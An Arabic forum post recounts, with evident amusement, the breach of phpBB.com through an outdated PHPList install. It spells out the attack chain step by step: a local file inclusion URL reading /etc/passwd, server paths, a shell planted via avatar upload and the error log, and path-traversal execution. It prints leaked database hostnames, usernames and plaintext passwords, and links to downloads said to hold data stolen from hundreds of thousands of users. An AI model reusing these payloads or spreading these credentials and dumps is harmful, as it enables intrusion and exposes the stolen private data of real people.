phpBB.com Hacked
السلام عليكم ...
بصراحة اليوم فاجئني خبر من صديق لي يقلي على إختراق موقع البرنامج الشهير www.phpBB.com
حيث انه قام بإختراقها بأسهل طريقة لم تتوقع ! عن طريق برنامج الPHPlist المعروف ايضا ولاكن للاسف قبل ايام قليلة
طرحت ثغره فيه بلميلورم
الثغره عبارة عن Local File Inclusion Exploit حيث قام المخترق بلولوج لملف ال/etc/passwd لسيرفر البرنامج عن طريق الامر
والملف طبعا تم رفعه على الرايبد شيركود:http://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd
ومن ثم توجه الى ملف الاباتشي لمعرفه مسار الموقعكود:http://rapidshare.com/files/192159914/etc.txt
وتم الوصول لملف الإيرركود:/etc/httpd/conf/httpd.conf
ومن ثم تم معرفة مسار منتديات الphpBBكود:/home/logs/phpbb.com/error_log
ومعروف عن منتديات الphpBB انك تستطيع حقن كود (شيل) بملف الerror log , ولو تركب منتدى phpBB بجهازك تشوف المسار يكون كداكود:home/virtual/phpbb.com/community
وثم تم حقن الكود (شيل) عن طريق رفع الصورةكود:/home/virtual/phpbb.com/community/images/avatars/upload
ومن ثم قام بمعرفة السيكريت كود حق الشل ( الصورة ) عن طريقة ملف الإيرر لوج الي تم إيضاحه مسبقاكود:(secret hash)_userid.jpg
وبعدها يصير كل مايبي يشغل الكود ( الشيل ) بلطريقة هذه ( مثل تخطي المود سيكيورتي)..كود:f51ee61fe7a83fdf72780912bced0855
وهذه الطريقة كان المخترق بيمتحن سيرفرهم اذا تمشي عليهم ام لا ... بحيث كان السكربت يقرا الكونفيجكود:/../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg
كود:/home/virtual/phpbb.com/community/config.phpوتم قرائة ملف الكونفيج لبرنامج الPHPLIST :dالمصيبة هذا هع هعكود:$dbms = 'mysqli'; $dbhost = 'phpbb.db.osuosl.org'; $dbport = ''; $dbname = 'phpbb'; $dbuser = 'phpbb2'; $dbpasswd = 'saxM9nfRjLbJ2Yy5'; $table_prefix = 'community_';
طبعا هذه الطريقة شرحتها لكم من موقع قام بعمله على الرابط http://hackedphpbb.blogspot.com/كود:$database_host = "localhost"; $database_name = "phpbb_phplist"; $database_user = 'phplist'; $database_password = 'Berti3_Danc3';
وبلنهاية تم سحب باسووردات الاعضاء اكثر من 200.000 الف عضو بلإضافة الى باسووردات وايميلات مشتركين بنحو
400.000 الف عضو ! والمصيبة انه باسوورداتهم كلها كلير تكست !!!!
وهذه القواعد ومعلومات الأعضاء وايميلاتهم تم رفعها على الرايبد شير
كود:http://rapidshare.com/files/192305758/out.txt http://rapidshare.com/files/192304153/phpbb_users.sql http://hackedphpbb.pastebin.com/f1399b3e8 http://rapidshare.com/files/192261517/backup_sql.gz
وبلنهاية رسالتهم من الموقع !
ونتمنى من الاخوة اخذ الإختراق هذا موعظة لعدم نسيان او التهاون بوجود ملفات قديمة بلمنتدى !كود:Maintenance We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList installation. phpBB.com and related sites will remain unavailable while we work to recover. No vulnerabilities have been found in the phpBB software itself. You can download phpBB here: http://www.ohloh.net/p/phpbb You can get support at the temporary support forums or on IRC: chat.freenode.net #phpbb – the phpBB team
حيث انه المخترق كان عضو قديم بلمنتدى وتذكر ! انه الموقع يحتوي على البرنامج المصاب !
وقام المخترق بتوضيح إختراقه للموقع حيث قال
تحياتي !كود:-----------------------------------UPDATE to all that same i am a script kiddie, **** you phpbb, i did not alter any files on your server, everything i gained access to has been listed in this blog
:nice:
المصـــدر
رد مع اقتباس
المشاركة الأصلية كتبت بواسطة MSH3AL 
